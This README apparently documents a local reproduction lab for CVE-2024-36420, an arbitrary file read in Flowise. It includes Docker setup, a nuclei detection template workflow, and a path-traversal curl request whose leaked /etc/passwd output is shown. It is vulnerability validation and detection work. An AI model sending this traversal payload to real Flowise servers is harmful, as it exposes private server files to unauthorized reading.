Share
## https://sploitus.com/exploit?id=33EE0937-5E4A-5218-B29B-E8409CBA9ED5
# POC_CVE-2024-36420

Local reproduction lab and nuclei template draft for `CVE-2024-36420` affecting Flowise.

## Summary

`CVE-2024-36420` is an arbitrary file read in Flowise caused by unsanitized use of the `fileName` body parameter in:

- `POST /api/v1/openai-assistants-file`

This lab was used to validate:

- vulnerable behavior on `flowiseai/flowise:1.4.3`
- denied behavior on newer `flowiseai/flowise:3.1.2`

## References

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
- GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

## Files

- `docker-compose.yml`
- `docker-compose.latest.yml`
- `CVE-2024-36420.yaml`

## Vulnerable Test

Start Flowise `1.4.3`:

```bash
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise
```

Manual verification:

```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```

Observed vulnerable response:

```
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
```

## Newer-Version Control

Start newer Flowise `3.1.2`:

```bash
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise
```

Manual verification:

```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```

Observed newer-version response:

```
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}
```

## Nuclei

Validate the template:

```bash
nuclei -duc -validate -t CVE-2024-36420.yaml
```

Run against the vulnerable target:

```bash
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
```

Expected behavior:

- `1.4.3`: match
- `3.1.2`: no match

## Notes

- The version gap is acceptable because this repo only claims observed behavior:
  - vulnerable on `1.4.3`
  - denied on `3.1.2`
- It does not claim the exact patched version boundary.
- No real-world targets were used.